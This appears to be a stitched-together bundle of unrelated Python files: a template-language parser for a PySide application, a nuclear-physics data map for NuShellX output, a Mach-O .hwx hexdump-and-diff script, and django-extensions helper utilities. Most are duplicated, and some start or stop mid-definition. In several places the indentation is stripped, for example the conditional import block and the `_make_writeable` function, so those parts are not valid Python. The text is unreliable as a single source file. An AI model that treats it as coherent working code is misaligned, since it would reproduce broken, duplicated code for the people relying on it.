        '__timefmt__': (
            QApplication.translate('templates', '{}{}d {:02d}:{:02d}:{:02d}'),
            QApplication.translate('templates', '{}{}:{:02d}:{:02d}'),
            QApplication.translate('templates', '{}{:02d}:{:02d}'),
        ),
    }
    def __init__(self, source, function_modules=[]):
        """Parse *source*; *function_modules* add extra template functions.

        NOTE(review): the mutable default list is safe as written because
        it is only read, never mutated.
        """
        if len(function_modules) > 0:
            repo = FunctionRepo(function_modules, std_function_repo)
        else:
            repo = std_function_repo
        self._block = Parser(source, repo).parse()
    def render(self, context):
        """Render the template; std_vars are added to *context* in place."""
        for k, v in self.std_vars.items():
            context.setdefault(k, v)
        return self._block.render(context)
    def __repr__(self):
        return repr(self._block)
if __name__ == '__main__':
    # Ad-hoc test harness: argv[1] is a template source string; optional
    # argv[2] is a Python dict literal eval'd into the render context
    # (eval is acceptable only because this is a developer-only tool).
    import sys
    t = Template(sys.argv[1])
    print(repr(t))
    if len(sys.argv) >= 3:
        print(repr(t.render(eval(sys.argv[2]))))
import inspect
import io
from abc import ABCMeta, abstractmethod
from PySide.QtGui import QApplication
if __package__:
from . import functions
else:
import functions
class TemplateError(Exception):
    """Raised for template syntax errors and function-signature problems."""
    pass
class Renderable(metaclass=ABCMeta):
    """Abstract base for template AST nodes."""
    @abstractmethod
    def render(self, context):
        """Return this node's string output for *context* (a dict)."""
        pass
class Text(Renderable):
    """Literal text node; renders to its stored string, ignoring context."""
    def __init__(self, text):
        self.text = text
    def render(self, context):
        return self.text
    def __repr__(self):
        return repr(self.text)
class Variable(Renderable):
    """Variable lookup node; missing names render as '' instead of raising."""
    def __init__(self, name):
        self.name = name
    def render(self, context):
        return context.get(self.name, '')
    def __repr__(self):
        return 'Variable: %s' % self.name
class Block(Renderable):
    """Sequence node: renders each child in order and concatenates."""
    def __init__(self):
        self.elements = []
    def append(self, elem):
        self.elements.append(elem)
    def isempty(self):
        # True when no child nodes have been appended.
        return not self.elements
    def render(self, context):
        parts = [e.render(context) for e in self.elements]
        return ''.join(parts)
    def __repr__(self):
        return '\n'.join(map(repr, self.elements))
class BaseFunction(Renderable):
    """Function-call node: evaluates its argument Blocks, then applies the
    wrapped callable. Subclasses tweak how arguments are delivered."""
    def __init__(self, function, args):
        self.function = function
        self.args = args
    def get_arg(self, arg, context):
        # Eager evaluation: render one argument Block to a string.
        return arg.render(context)
    def get_args(self, context):
        return [self.get_arg(a, context) for a in self.args]
    def render(self, context):
        return self.function(*self.get_args(context))
    def __repr__(self):
        return (self.__class__.__name__ + ': ' + self.function.__name__ + '(\n ' +
            ',\n'.join(repr(a) for a in self.args).replace('\n', '\n ') + '\n)')
class Function(BaseFunction):
    """Plain template function: arguments are rendered eagerly."""
    pass
class LazyFunction(BaseFunction):
    """Template function whose arguments arrive as zero-argument callables,
    letting the function decide whether/when to evaluate each one."""
    def get_arg(self, arg, context):
        # super() is captured eagerly via the default argument: the lambda
        # itself cannot use the zero-argument super() form.
        return lambda s=super(): s.get_arg(arg, context)
class ContextFunction(BaseFunction):
    """Template function that receives the render context as its first
    (implicit) argument."""
    def get_args(self, context):
        return [context] + super().get_args(context)
class LazyContextFunction(ContextFunction, LazyFunction):
    """Context-receiving function with lazily evaluated arguments.

    The MRO combines ContextFunction.get_args with LazyFunction.get_arg.
    """
    pass
class FunctionRepo:
    """Registry of template functions discovered in Python modules.

    Functions are picked up by name prefix: ``f_`` (plain), ``lazy_``,
    ``context_`` and ``lazycontext_``; the prefix selects the node class
    used for calls and is stripped from the template-visible name.  Each
    entry maps name -> (callable, node class, min_args, max_args), where
    max_args is None for *args functions and both counts exclude the
    implicit context argument of context functions.
    """
    def __init__(self, modules, parent=None):
        self.parent = parent
        self.data = {}
        for module in modules:
            for name in dir(module):
                function = getattr(module, name)
                if name.startswith('f_'):
                    cls = Function
                    name = name[2:]
                elif name.startswith('lazy_'):
                    cls = LazyFunction
                    name = name[5:]
                elif name.startswith('context_'):
                    cls = ContextFunction
                    name = name[8:]
                elif name.startswith('lazycontext_'):
                    cls = LazyContextFunction
                    name = name[12:]
                else:
                    continue
                min_args, max_args = self._count_args(function, name, module)
                if cls == ContextFunction or cls == LazyContextFunction:
                    if max_args is not None and max_args < 1:
                        raise TemplateError("Context function must accept at least one argument: "
                                            "function '%s' from %r" % (name, module))
                    # Exclude the implicit context argument from both bounds.
                    # (Fixed: the old code clamped min_args to 1 instead of
                    # subtracting one, and crashed on None max_args.)
                    min_args = max(min_args - 1, 0)
                    if max_args is not None:
                        max_args -= 1
                self.data[name] = (function, cls, min_args, max_args)

    @staticmethod
    def _count_args(function, name, module):
        """Return (min_args, max_args) for *function*; max_args is None
        when the function accepts *args.  Raises TemplateError for
        unusable signatures."""
        min_args = 0
        max_args = 0
        try:
            sig = inspect.signature(function)
        except ValueError:
            raise TemplateError("Can't obtain signature for function '%s' from %r" % (name, module))
        for p in sig.parameters.values():
            if (p.kind == inspect.Parameter.POSITIONAL_ONLY or
                    p.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD):
                if max_args is not None:
                    max_args += 1
                if p.default == inspect.Parameter.empty:
                    min_args += 1
            elif p.kind == inspect.Parameter.VAR_POSITIONAL:
                max_args = None
            elif (p.kind == inspect.Parameter.KEYWORD_ONLY and
                    p.default == inspect.Parameter.empty):
                raise TemplateError("Required keyword-only arguments are not allowed: "
                                    "function '%s' from %r" % (name, module))
        return min_args, max_args

    def get(self, name):
        """Look up *name*, falling back to the parent repository; returns
        (function, cls, min_args, max_args), all None when unknown."""
        data = self.data.get(name, None)
        if data is None:
            if self.parent is None:
                data = (None, None, None, None)
            else:
                data = self.parent.get(name)
        return data
# Shared repository of the built-in template functions; used as the
# fallback parent for per-Template repositories.
std_function_repo = FunctionRepo([functions])
class Parser:
    """Recursive-descent parser for the template mini-language.

    ``%name%`` renders a variable, ``$name(arg1,arg2,...)`` calls a
    registered function (arguments are nested blocks), a backslash
    escapes the following character; everything else is literal text.
    """
    VAR = '%'
    FUNC = '$'
    FUNC_START = '('
    FUNC_COMMA = ','
    FUNC_END = ')'
    ESC = '\\'
    def __init__(self, source, function_repo):
        self.source = source
        self._function_repo = function_repo
        self._pos = -1
        self._line = 1
        self._col = 0
    def _get(self):
        """Consume and return the next character, or None at end of input."""
        self._oldpos = self._pos
        self._oldcol = self._col
        self._oldline = self._line
        self._pos += 1
        self._col += 1
        if self._pos >= len(self.source):
            return None
        c = self.source[self._pos]
        if c == '\n':
            self._line += 1
            self._col = 0
        return c
    def _unget(self):
        """Push the last character back (one step of lookahead)."""
        assert self._pos >= 0
        self._pos = self._oldpos
        self._col = self._oldcol
        self._line = self._oldline
    def _parse_identifier(self):
        """Read a run of [A-Za-z0-9_] characters (possibly empty)."""
        s = io.StringIO()
        while True:
            c = self._get()
            if c is None:
                # EOF must be handled before the range comparisons below:
                # comparing None with str raises TypeError (this previously
                # crashed on input ending right after an identifier).
                return s.getvalue()
            elif 'a' <= c <= 'z' or 'A' <= c <= 'Z' or '0' <= c <= '9' or c == '_':
                s.write(c)
            else:
                self._unget()
                return s.getvalue()
    def _parse_text(self, as_argument=False):
        """Read literal text up to the next markup character (or EOF)."""
        s = io.StringIO()
        while True:
            c = self._get()
            if c is None:
                return Text(s.getvalue())
            elif c == self.VAR or c == self.FUNC or (
                    as_argument and (c == self.FUNC_COMMA or c == self.FUNC_END)):
                self._unget()
                return Text(s.getvalue())
            elif c == self.ESC:
                # Backslash escapes the next character; a trailing
                # backslash at EOF is silently dropped.
                c = self._get()
                if c is not None:
                    s.write(c)
            else:
                s.write(c)
    def _parse_var(self):
        """Parse ``name%`` of a variable (the leading % is already consumed)."""
        name = self._parse_identifier()
        if name == '':
            raise self._error('Syntax error: empty variable name')
        c = self._get()
        if c != self.VAR:
            raise self._error('Syntax error: undelimited variable')
        return Variable(name)
    def _parse_block(self, as_argument=False):
        """Parse a sequence of text/variable/function nodes into a Block."""
        elems = Block()
        while True:
            c = self._get()
            if c is None:
                return elems
            elif c == self.VAR:
                elems.append(self._parse_var())
            elif c == self.FUNC:
                elems.append(self._parse_func())
            elif as_argument and (c == self.FUNC_COMMA or c == self.FUNC_END):
                self._unget()
                return elems
            else:
                self._unget()
                elems.append(self._parse_text(as_argument))
    def _parse_func(self):
        """Parse ``name(arg,...)`` (the leading $ is already consumed) and
        validate the call against the function repository."""
        name = self._parse_identifier()
        if name == '':
            raise self._error('Syntax error: empty function name')
        c = self._get()
        if c != self.FUNC_START:
            raise self._error("Syntax error: expected '('")
        args = []
        while True:
            args.append(self._parse_block(True))
            c = self._get()
            if c == self.FUNC_END:
                break
            elif c != self.FUNC_COMMA:
                raise self._error("Syntax error: expected ',' or ')'")
        # '$f()' parses as a single empty argument; treat as zero arguments.
        if len(args) == 1 and args[0].isempty():
            args = []
        f, NodeClass, min_args, max_args = self._function_repo.get(name)
        if f is None:
            raise self._error("Unknown function: '%s'" % name)
        if len(args) < min_args:
            raise self._error("Function '%s' expects at least %d arguments, "
                              "%d given" % (name, min_args, len(args)))
        if max_args is not None and len(args) > max_args:
            raise self._error("Function '%s' expects at most %d arguments, "
                              "%d given" % (name, max_args, len(args)))
        return NodeClass(f, args)
    def parse(self):
        """Parse the whole source and return the root Block node."""
        return self._parse_block()
    def _error(self, msg):
        # Returned, not raised, so call sites read `raise self._error(...)`.
        # NOTE(review): self._line/_col are tracked but not reported here.
        return TemplateError(msg)
class Template(Renderable):
    """A parsed template; render() evaluates it against a context dict."""
    # Defaults injected into every render context. __timefmt__ holds three
    # translated duration formats (presumably days / hours / minutes
    # granularity variants -- confirm against the duration-formatting code).
    std_vars = {
        '__timefmt__': (
            QApplication.translate('templates', '{}{}d {:02d}:{:02d}:{:02d}'),
            QApplication.translate('templates', '{}{}:{:02d}:{:02d}'),
            QApplication.translate('templates', '{}{:02d}:{:02d}'),
        ),
    }
    def __init__(self, source, function_modules=[]):
        """Parse *source*; *function_modules* add extra template functions.

        NOTE(review): the mutable default list is safe as written because
        it is only read, never mutated.
        """
        if len(function_modules) > 0:
            repo = FunctionRepo(function_modules, std_function_repo)
        else:
            repo = std_function_repo
        self._block = Parser(source, repo).parse()
    def render(self, context):
        """Render the template; std_vars are added to *context* in place."""
        for k, v in self.std_vars.items():
            context.setdefault(k, v)
        return self._block.render(context)
    def __repr__(self):
        return repr(self._block)
if __name__ == '__main__':
    # Ad-hoc test harness: argv[1] is a template source string; optional
    # argv[2] is a Python dict literal eval'd into the render context
    # (eval is acceptable only because this is a developer-only tool).
    import sys
    t = Template(sys.argv[1])
    print(repr(t))
    if len(sys.argv) >= 3:
        print(repr(t.render(eval(sys.argv[2]))))
from __future__ import print_function, division, unicode_literals
from deprecated.ncsm_vce_lpt.parser import exp
from deprecated.nushellx_lpt.DataMapNushellxLpt import DataMapNushellxLpt
from constants import FN_PARSE_LPT_RGX_FNAME as _RGX_FNAME
from constants import FN_PARSE_NCSMVCE_LPT_RGX_DNAME as _RGX_DNAME_GGP
from deprecated.ncsm_vce_lpt.ExpNcsmVceLpt import ExpNcsmVceLpt
class DataMapNcsmVceLpt(DataMapNushellxLpt):
    """Data type that stores a map to *.lpt file data, generated by NuShellX
    on interaction files from a VCE of NCSM results
    """
    # noinspection PyUnusedLocal
    def __init__(
            self, parent_directory, exp_list=None, exp_filter_fn=None, **kwargs
    ):
        """Initialize the DataMap in the given parent_directory
        :param parent_directory: directory in which to recursively retrieve
        files
        :param exp_list: list of exp for which to gather data
        :param exp_filter_fn: function with which to filter files by their exp
        :param kwargs: other arguments to pass to DatumLpt
        """
        super(DataMapNcsmVceLpt, self).__init__(
            parent_directory=parent_directory,
            exp_list=exp_list, exp_filter_fn=exp_filter_fn,
            _exp_type=ExpNcsmVceLpt,
            _rgx_fname_lpt=_RGX_FNAME,
            _rgx_dname_ggparent_dir=_RGX_DNAME_GGP
        )

    def _exp_from_file_path(self, f):
        """Construct the exp key for the given *.lpt file path."""
        return exp(filepath=f)

    @staticmethod
    def _exp_matches(exp0, z, nmax, n1, n2, nshell, ncomponent,
                     scalefactor, incl_proton):
        """True if exp0 is an (A, A, A) prescription whose parameters all
        match the requested ones. Shared filter for the map methods below.
        """
        presc = exp0.A_presc
        return (
            presc[0] == presc[1] == presc[2] and
            exp0.Z == z and exp0.Nmax == nmax and
            exp0.n1 == n1 and exp0.n2 == n2 and
            exp0.nshell == nshell and exp0.ncomponent == ncomponent and
            exp0.scale == scalefactor and exp0.incl_proton == incl_proton
        )

    def aeff_eq_a_to_n_to_j_energy_map(
            self, z, nmax, n1, n2, nshell, ncomponent, scalefactor=None,
            incl_proton=True,
    ):
        """Returns a map
            Aeff=A -> N -> (J, Energy)
        where the Energy is that associated with index N from the lpt file
        with the addition of the zero body term for the
        prescription (A, A, A) with mass A.
        :param z: proton number (Z)
        :param nmax: oscillator truncation
        :param n1: one-particle TBME interaction truncation
        :param n2: two-particle TBME interaction truncation
        :param nshell: major oscillator shell (0=s, 1=p, 2=sd, ...)
        :param ncomponent: 1 -> neutrons, 2 -> protons & neutrons
        :param scalefactor: factor by which off-diagonal coupling terms in
        the interaction were scaled
        :param incl_proton: whether or not proton interaction was included.
        """
        a_to_n_to_energy_map = dict()
        for exp0 in self.map.keys():
            if not self._exp_matches(exp0, z, nmax, n1, n2, nshell,
                                     ncomponent, scalefactor, incl_proton):
                continue
            a = exp0.A_presc[0]
            dat = self[exp0]
            mass_to_zbt_map = dat.mass_to_zbt_map()
            mass_to_ex_states_map = dat.mass_to_ex_states_map()
            if a in mass_to_zbt_map and a in mass_to_ex_states_map:
                n_to_je = a_to_n_to_energy_map.setdefault(a, dict())
                zbt = mass_to_zbt_map[a]
                for ex_state in mass_to_ex_states_map[a]:
                    # Absolute energy = excitation energy + zero-body term.
                    n_to_je[ex_state.N] = (ex_state.J, ex_state.E + zbt)
        return a_to_n_to_energy_map

    def aeff_eq_a_to_ground_energy_map(
            self, z, nmax, n1, n2, nshell, ncomponent, scalefactor=None,
            incl_proton=True,
    ):
        """Returns a map
            Aeff=A -> Ground energy
        where the ground energy is that from the lpt file for the prescription
        (A, A, A) with mass A.
        :param z: proton number (Z)
        :param nmax: oscillator truncation
        :param n1: one-particle TBME interaction truncation
        :param n2: two-particle TBME interaction truncation
        :param nshell: major oscillator shell (0=s, 1=p, 2=sd, ...)
        :param ncomponent: 1 -> neutrons, 2 -> protons & neutrons
        :param scalefactor: factor by which off-diagonal coupling terms in
        the interaction were scaled
        :param incl_proton: whether or not proton interaction was included.
        """
        aeff_eq_a_to_ground_energy = dict()
        for exp0 in self.map.keys():
            if not self._exp_matches(exp0, z, nmax, n1, n2, nshell,
                                     ncomponent, scalefactor, incl_proton):
                continue
            a = exp0.A_presc[0]
            ground_energy_map = self[exp0].mass_to_ground_energy_map(
                nshell=nshell)
            if a in ground_energy_map:
                aeff_eq_a_to_ground_energy[a] = ground_energy_map[a]
        return aeff_eq_a_to_ground_energy
from deprecated.ncsm_vce_lpt.parser import exp
from deprecated.nushellx_lpt.DataMapNushellxLpt import DataMapNushellxLpt
from constants import FN_PARSE_LPT_RGX_FNAME as _RGX_FNAME
from constants import FN_PARSE_NCSMVCE_LPT_RGX_DNAME as _RGX_DNAME_GGP
from deprecated.ncsm_vce_lpt.ExpNcsmVceLpt import ExpNcsmVceLpt
class DataMapNcsmVceLpt(DataMapNushellxLpt):
    """Data type that stores a map to *.lpt file data, generated by NuShellX
    on interaction files from a VCE of NCSM results
    """
    # noinspection PyUnusedLocal
    def __init__(
            self, parent_directory, exp_list=None, exp_filter_fn=None, **kwargs
    ):
        """Initialize the DataMap in the given parent_directory
        :param parent_directory: directory in which to recursively retrieve
        files
        :param exp_list: list of exp for which to gather data
        :param exp_filter_fn: function with which to filter files by their exp
        :param kwargs: other arguments to pass to DatumLpt
        """
        super(DataMapNcsmVceLpt, self).__init__(
            parent_directory=parent_directory,
            exp_list=exp_list, exp_filter_fn=exp_filter_fn,
            _exp_type=ExpNcsmVceLpt,
            _rgx_fname_lpt=_RGX_FNAME,
            _rgx_dname_ggparent_dir=_RGX_DNAME_GGP
        )

    def _exp_from_file_path(self, f):
        """Construct the exp key for the given *.lpt file path."""
        return exp(filepath=f)

    @staticmethod
    def _exp_matches(exp0, z, nmax, n1, n2, nshell, ncomponent,
                     scalefactor, incl_proton):
        """True if exp0 is an (A, A, A) prescription whose parameters all
        match the requested ones. Shared filter for the map methods below.
        """
        presc = exp0.A_presc
        return (
            presc[0] == presc[1] == presc[2] and
            exp0.Z == z and exp0.Nmax == nmax and
            exp0.n1 == n1 and exp0.n2 == n2 and
            exp0.nshell == nshell and exp0.ncomponent == ncomponent and
            exp0.scale == scalefactor and exp0.incl_proton == incl_proton
        )

    def aeff_eq_a_to_n_to_j_energy_map(
            self, z, nmax, n1, n2, nshell, ncomponent, scalefactor=None,
            incl_proton=True,
    ):
        """Returns a map
            Aeff=A -> N -> (J, Energy)
        where the Energy is that associated with index N from the lpt file
        with the addition of the zero body term for the
        prescription (A, A, A) with mass A.
        :param z: proton number (Z)
        :param nmax: oscillator truncation
        :param n1: one-particle TBME interaction truncation
        :param n2: two-particle TBME interaction truncation
        :param nshell: major oscillator shell (0=s, 1=p, 2=sd, ...)
        :param ncomponent: 1 -> neutrons, 2 -> protons & neutrons
        :param scalefactor: factor by which off-diagonal coupling terms in
        the interaction were scaled
        :param incl_proton: whether or not proton interaction was included.
        """
        a_to_n_to_energy_map = dict()
        for exp0 in self.map.keys():
            if not self._exp_matches(exp0, z, nmax, n1, n2, nshell,
                                     ncomponent, scalefactor, incl_proton):
                continue
            a = exp0.A_presc[0]
            dat = self[exp0]
            mass_to_zbt_map = dat.mass_to_zbt_map()
            mass_to_ex_states_map = dat.mass_to_ex_states_map()
            if a in mass_to_zbt_map and a in mass_to_ex_states_map:
                n_to_je = a_to_n_to_energy_map.setdefault(a, dict())
                zbt = mass_to_zbt_map[a]
                for ex_state in mass_to_ex_states_map[a]:
                    # Absolute energy = excitation energy + zero-body term.
                    n_to_je[ex_state.N] = (ex_state.J, ex_state.E + zbt)
        return a_to_n_to_energy_map

    def aeff_eq_a_to_ground_energy_map(
            self, z, nmax, n1, n2, nshell, ncomponent, scalefactor=None,
            incl_proton=True,
    ):
        """Returns a map
            Aeff=A -> Ground energy
        where the ground energy is that from the lpt file for the prescription
        (A, A, A) with mass A.
        :param z: proton number (Z)
        :param nmax: oscillator truncation
        :param n1: one-particle TBME interaction truncation
        :param n2: two-particle TBME interaction truncation
        :param nshell: major oscillator shell (0=s, 1=p, 2=sd, ...)
        :param ncomponent: 1 -> neutrons, 2 -> protons & neutrons
        :param scalefactor: factor by which off-diagonal coupling terms in
        the interaction were scaled
        :param incl_proton: whether or not proton interaction was included.
        """
        aeff_eq_a_to_ground_energy = dict()
        for exp0 in self.map.keys():
            if not self._exp_matches(exp0, z, nmax, n1, n2, nshell,
                                     ncomponent, scalefactor, incl_proton):
                continue
            a = exp0.A_presc[0]
            ground_energy_map = self[exp0].mass_to_ground_energy_map(
                nshell=nshell)
            if a in ground_energy_map:
                aeff_eq_a_to_ground_energy[a] = ground_energy_map[a]
        return aeff_eq_a_to_ground_energy
from hexdump import hexdump
from macholib import MachO
def get_macho(fn):
    """Load *fn* as a Mach-O image, patching the magic number first.

    The .hwx container differs from a regular Mach-O in its magic bytes,
    so rewrite the first four bytes to MH_CIGAM_64 and hand the patched
    copy (via a temp file kept on disk) to macholib.
    """
    # mod to make the header okay
    # MH_CIGAM_64 is good
    with open(fn, "rb") as inf:  # fixed: the original leaked this handle
        dat = inf.read()
    dat = b"\xcf\xfa\xed\xfe"+dat[4:]
    from tempfile import NamedTemporaryFile
    with NamedTemporaryFile(delete=False) as f:
        f.write(dat)
    # delete=False keeps the file alive for macholib to re-open by name.
    return MachO.MachO(f.name)
# Parse the generated model and dump its load commands and sections.
a = get_macho("model.hwx")
# load commands
for c in a.headers[0].commands:
    print(c[0])
    if c[0].cmd == 25:
        # cmd 25 == 0x19 == LC_SEGMENT_64: print each section header and
        # hexdump the section payload.
        print(c[1])
        for section in c[2]:
            print(section.segname.strip(b'\0'), section.sectname.strip(b'\0'), hex(section.addr), hex(section.size), "@", hex(c[1].fileoff))
            #print(dir(section))
            if c[1].filesize > 0:
                hexdump(section.section_data)
# this parser is wrong (fixed with 64-bit one)
from macholib import SymbolTable
sym = SymbolTable.SymbolTable(a)
# Keep only symbols that carry a concrete address (n_value != 0).
syms = {}
for l in sym.nlists:
    print(l)
    if l[0].n_value != 0:
        syms[l[1]] = l[0].n_value
for k,v in syms.items():
    print(k, hex(v))
from termcolor import colored
def compare(x, y):
    """Return a side-by-side colored hex-dump diff of byte strings x and y.

    Differing bytes are colored (green on the left/x side, red on the
    right/y side); positions reached by the next_highlight walk are shown
    in yellow. Output is 16 bytes per row, grouped in fours.
    """
    ss = []
    ln = []
    ln2 = []
    # Round the longer length up to a whole 16-byte row.
    ll = (max(len(x), len(y)) + 0xF)//0x10 * 0x10
    highlight = False
    # NOTE(review): the 0x2b start offset and the y[i]+8 stride look like
    # record boundaries inside the blob being compared -- confirm against
    # the .hwx format before relying on the yellow markers.
    next_highlight = 0x2b
    for i in range(ll+1):
        if i == next_highlight:
            highlight = True
            if i < len(y):
                next_highlight += y[i]+8
            else:
                next_highlight = None
        else:
            highlight = False
        # Hex representation for both inputs; "--" once past either end.
        a = "%02X" % x[i] if i < len(x) else "--", \
            "%02X" % y[i] if i < len(y) else "--"
        def fj(x):
            # Join 16 byte strings into four space-separated groups of 4.
            ss = []
            for i in range(0, 0x10, 4):
                ss.append(' '.join(x[i:i+4]))
            return '  '.join(ss)
        if i!=0 and i%0x10 == 0:
            # Flush a completed 16-byte row.
            ss.append("%8X: " % (i-0x10)+fj(ln)+" | "+fj(ln2)+"\n")
            ln = []
            ln2 = []
        if a[0] != a[1] and a[0] != "--" and a[1] != "--":
            ln.append(colored(a[0], 'green'))
            ln2.append(colored(a[1], 'red'))
        else:
            if highlight:
                ln.append(colored(a[0], 'yellow'))
                ln2.append(colored(a[1], 'yellow'))
            else:
                ln.append(a[0])
                ln2.append(a[1])
    return ''.join(ss)
# Diff the freshly built model against the golden reference, one
# 0x300-byte op record at a time.
g = get_macho("model.hwx.golden")
f1 = g.headers[0].commands[1][2][0].section_data
f2 = a.headers[0].commands[1][2][0].section_data
for i in range(0, len(f2), 0x300):
    print("===== op %d =====" % (i//0x300))
    if len(f1) < 0x300:
        # Golden blob holds a single short record; reuse it for every op.
        print(compare(f1, f2[i:i+0x300]))
    else:
        print(compare(f1[i:i+0x300], f2[i:i+0x300]))
#open("/tmp/data.section", "wb").write(f2)
#print(compare(open("model.hwx.golden", "rb").read(), open("model.hwx", "rb").read()))
from hexdump import hexdump
from macholib import MachO
def get_macho(fn):
    """Load *fn* as a Mach-O image, patching the magic number first.

    The .hwx container differs from a regular Mach-O in its magic bytes,
    so rewrite the first four bytes to MH_CIGAM_64 and hand the patched
    copy (via a temp file kept on disk) to macholib.
    """
    # mod to make the header okay
    # MH_CIGAM_64 is good
    with open(fn, "rb") as inf:  # fixed: the original leaked this handle
        dat = inf.read()
    dat = b"\xcf\xfa\xed\xfe"+dat[4:]
    from tempfile import NamedTemporaryFile
    with NamedTemporaryFile(delete=False) as f:
        f.write(dat)
    # delete=False keeps the file alive for macholib to re-open by name.
    return MachO.MachO(f.name)
# Parse the generated model and dump its load commands and sections.
a = get_macho("model.hwx")
# load commands
for c in a.headers[0].commands:
    print(c[0])
    if c[0].cmd == 25:
        # cmd 25 == 0x19 == LC_SEGMENT_64: print each section header and
        # hexdump the section payload.
        print(c[1])
        for section in c[2]:
            print(section.segname.strip(b'\0'), section.sectname.strip(b'\0'), hex(section.addr), hex(section.size), "@", hex(c[1].fileoff))
            #print(dir(section))
            if c[1].filesize > 0:
                hexdump(section.section_data)
# this parser is wrong (fixed with 64-bit one)
from macholib import SymbolTable
sym = SymbolTable.SymbolTable(a)
# Keep only symbols that carry a concrete address (n_value != 0).
syms = {}
for l in sym.nlists:
    print(l)
    if l[0].n_value != 0:
        syms[l[1]] = l[0].n_value
for k,v in syms.items():
    print(k, hex(v))
from termcolor import colored
def compare(x, y):
    """Return a side-by-side colored hex-dump diff of byte strings x and y.

    Differing bytes are colored (green on the left/x side, red on the
    right/y side); positions reached by the next_highlight walk are shown
    in yellow. Output is 16 bytes per row, grouped in fours.
    """
    ss = []
    ln = []
    ln2 = []
    # Round the longer length up to a whole 16-byte row.
    ll = (max(len(x), len(y)) + 0xF)//0x10 * 0x10
    highlight = False
    # NOTE(review): the 0x2b start offset and the y[i]+8 stride look like
    # record boundaries inside the blob being compared -- confirm against
    # the .hwx format before relying on the yellow markers.
    next_highlight = 0x2b
    for i in range(ll+1):
        if i == next_highlight:
            highlight = True
            if i < len(y):
                next_highlight += y[i]+8
            else:
                next_highlight = None
        else:
            highlight = False
        # Hex representation for both inputs; "--" once past either end.
        a = "%02X" % x[i] if i < len(x) else "--", \
            "%02X" % y[i] if i < len(y) else "--"
        def fj(x):
            # Join 16 byte strings into four space-separated groups of 4.
            ss = []
            for i in range(0, 0x10, 4):
                ss.append(' '.join(x[i:i+4]))
            return '  '.join(ss)
        if i!=0 and i%0x10 == 0:
            # Flush a completed 16-byte row.
            ss.append("%8X: " % (i-0x10)+fj(ln)+" | "+fj(ln2)+"\n")
            ln = []
            ln2 = []
        if a[0] != a[1] and a[0] != "--" and a[1] != "--":
            ln.append(colored(a[0], 'green'))
            ln2.append(colored(a[1], 'red'))
        else:
            if highlight:
                ln.append(colored(a[0], 'yellow'))
                ln2.append(colored(a[1], 'yellow'))
            else:
                ln.append(a[0])
                ln2.append(a[1])
    return ''.join(ss)
# Diff the freshly built model against the golden reference, one
# 0x300-byte op record at a time.
g = get_macho("model.hwx.golden")
f1 = g.headers[0].commands[1][2][0].section_data
f2 = a.headers[0].commands[1][2][0].section_data
for i in range(0, len(f2), 0x300):
    print("===== op %d =====" % (i//0x300))
    if len(f1) < 0x300:
        # Golden blob holds a single short record; reuse it for every op.
        print(compare(f1, f2[i:i+0x300]))
    else:
        print(compare(f1[i:i+0x300], f2[i:i+0x300]))
#open("/tmp/data.section", "wb").write(f2)
#print(compare(open("model.hwx.golden", "rb").read(), open("model.hwx", "rb").read()))
import logging
import os
import sys
import csv
import codecs
from io import BytesIO
from django_extensions.management.signals import post_command, pre_command
def _make_writeable(filename):
"""
Make sure that the file is writeable. Useful if our source is
read-only.
"""
import stat
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
def setup_logger(logger, stream, filename=None, fmt=None):
    """Sets up a logger (if no handlers exist) for console output,
    and file 'tee' output if desired."""
    if logger.handlers:
        # Already configured -- never attach duplicate handlers.
        return
    console = logging.StreamHandler(stream)
    console.setLevel(logging.DEBUG)
    console.setFormatter(logging.Formatter(fmt))
    logger.addHandler(console)
    logger.setLevel(logging.DEBUG)
    if filename:
        file_handler = logging.FileHandler(filename)
        file_handler.setLevel(logging.INFO)
        file_fmt = "%(asctime)s " + (fmt if fmt else '%(message)s')
        file_handler.setFormatter(logging.Formatter(file_fmt))
        logger.addHandler(file_handler)
class RedirectHandler(logging.Handler):
    """Handler that forwards every record to the logger named *name*."""
    def __init__(self, name, level=logging.DEBUG):
        # Contemplate feasibility of copying a destination (allow original handler) and redirecting.
        logging.Handler.__init__(self, level)
        self.name = name
        # Resolve the target logger once, up front.
        self.logger = logging.getLogger(name)
    def emit(self, record):
        # Re-dispatch through the target logger's own handler chain.
        self.logger.handle(record)
def signalcommand(func):
    """A decorator for management command handle defs that sends out a pre/post signal."""
    import functools

    # functools.wraps preserves the command's __name__/__doc__ so
    # introspection and help output keep working (previously lost).
    @functools.wraps(func)
    def inner(self, *args, **kwargs):
        pre_command.send(self.__class__, args=args, kwargs=kwargs)
        ret = func(self, *args, **kwargs)
        post_command.send(self.__class__, args=args, kwargs=kwargs, outcome=ret)
        return ret
    return inner
def has_ipdb():
    """Return True when both ipdb and IPython are importable."""
    try:
        import ipdb  # noqa
        import IPython  # noqa
    except ImportError:
        return False
    return True
class UnicodeWriter:
    """
    A CSV writer which will write rows to CSV file "f",
    which is encoded in the given encoding.
    """
    def __init__(self, f, dialect=csv.excel, encoding="utf-8", **kwds):
        # csv.writer produces text on Python 3, so buffer rows in a
        # StringIO (the original BytesIO queue raised TypeError) and
        # encode the result before writing it to the target stream.
        from io import StringIO
        self.queue = StringIO()
        self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
        self.stream = f
        self.encoder = codecs.getincrementalencoder(encoding)()

    def writerow(self, row):
        """Write one CSV record built from *row* (a sequence of strings)."""
        self.writer.writerow(row)
        # Fetch the formatted text from the queue ...
        data = self.queue.getvalue()
        # ... encode it into the target encoding and write to the stream.
        self.stream.write(self.encoder.encode(data))
        # Reset the queue (truncate alone would leave the position past
        # the discarded data).
        self.queue.seek(0)
        self.queue.truncate(0)

    def writerows(self, rows):
        """Write every row in *rows*."""
        for row in rows:
            self.writerow(row)
import os
import sys
import csv
import codecs
from io import BytesIO
from django_extensions.management.signals import post_command, pre_command
def _make_writeable(filename):
"""
Make sure that the file is writeable. Useful if our source is
read-only.
"""
import stat
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
def setup_logger(logger, stream, filename=None, fmt=None):
    """Sets up a logger (if no handlers exist) for console output,
    and file 'tee' output if desired."""
    if logger.handlers:
        # Already configured -- never attach duplicate handlers.
        return
    console = logging.StreamHandler(stream)
    console.setLevel(logging.DEBUG)
